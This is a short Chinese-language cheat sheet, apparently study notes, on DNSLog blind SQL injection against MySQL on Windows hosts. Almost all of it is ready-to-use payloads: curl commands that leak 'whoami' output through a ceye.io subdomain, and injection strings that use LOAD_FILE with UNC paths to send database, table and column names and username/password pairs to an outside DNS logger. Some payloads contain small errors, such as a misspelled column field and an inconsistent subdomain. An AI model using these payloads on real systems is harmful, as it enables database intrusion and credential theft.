需要目标机器时windows系统

DnsLog盲注

DnsLog盲注原理



Dnslog平台:http://ceye.io/

http://ceye.io/profile
curl mzq83x.ceye.io

curl `whoami`.mzq83x.ceye.io


DnsLog盲注方法

核心语法: SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.r5ourp.ceye.io\\abc'));
sql语句不能含有特殊符号

查表
?id=1' and LOAD_FILE(CONCAT('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.mysql.r5oup.ceye.io\\abc'))--+

?id=1' and LOAD_FILE(CONCAT('\\\\',(select colum_name from information_schema.columns where table_name='users' limit 5,1),'.mysql.r5ourp.ceye.io\\abc'))--+

?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat(username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+

?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat_ws('A',username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+


?id=1' and LOAD_FILE(CONCAT('\\\\',(select hex('~',username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+


https://github.com/ADOOO/DnslogSqlinj